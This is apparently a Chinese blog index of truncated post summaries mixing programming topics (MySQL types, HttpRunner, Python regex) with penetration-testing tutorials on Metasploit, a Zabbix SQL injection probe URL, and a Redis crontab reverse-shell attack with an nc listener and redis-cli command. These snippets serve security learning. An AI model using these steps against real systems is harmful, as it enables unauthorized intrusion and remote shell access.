摘要:
一、整型 分类:TINYINT, SMALLINT, MEDUIMINT, INT, BIGINT TINYINT 默认情况下是带有符号的,超出限制只存最大可接受值 create table test1(id TINYINT); insert into test1 values(-129,256); 阅读全文
摘要:
一、HttpRunner安装 HttpRunner存储于PyPI, 支持通过pip安装 pip install httprunner 查看httprunner版本,不报错就OK了 $ httprunner -V # hrun -V 3.1.0 allure安装 pip install allure- 阅读全文
摘要:
Nmap扫描 db_nmap -sV 192.168.1.0/24 Auxiliary模块 RHOSTS在指定目标时可以指定多个目标 指定IP范围:192.168.171.1.20-192.168.171.30 指定两个主机段:192.168.1.0/24,192.168.11.0/24 导入文件中 阅读全文
摘要:
一、简介 Meterpreter是Metasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里的payload就是shellcode,以获得目标系统的shell为目的的payload 我们获得的 阅读全文
摘要:
一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload,payload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的pay 阅读全文
摘要:
常用匹配模式(元字符) # 匹配模式 #一对一的匹配 # 'hello'.replace(old,new) # 'hello'.find('pattern') #正则匹配 import re #\w与\W print(re.findall('\w','hello egon 123')) #['h', 阅读全文
摘要:
MSF基本介绍 目前最流行、最强大、最具扩展性的渗透测试平台软件 2003年由HD More发布第一版,2007年用ruby语言重写,MSF默认集成在Kali Linux之中 Kali左侧有MSF的快捷方式,可以直接点击使用,也可以在终端输入msfconsole启动MSF msfdb 用来管理MSF 阅读全文
摘要:
三元表达式是python为我们提供的一种简化代码的解决方案,语法如下: res = 条件成立时返回的值 if 条件 else 条件不成立时返回的值 针对下述场景: def max2(x,y): if x > y: return x else: return y res = max2(1,2) 用三元 阅读全文
摘要:
zabbix服务开放端口为10051,浏览器访问http://IP/zabbix进行配置即可访问zabbix的前台页面。 漏洞利用: 1、sql注入漏洞探测: 在攻击机访问的zabbix的地址后面加上如下url: /jsrpc.php?sid=0bcd4ade648214dc&type=9&meth 阅读全文
摘要:
方法一、利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口: nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.6 阅读全文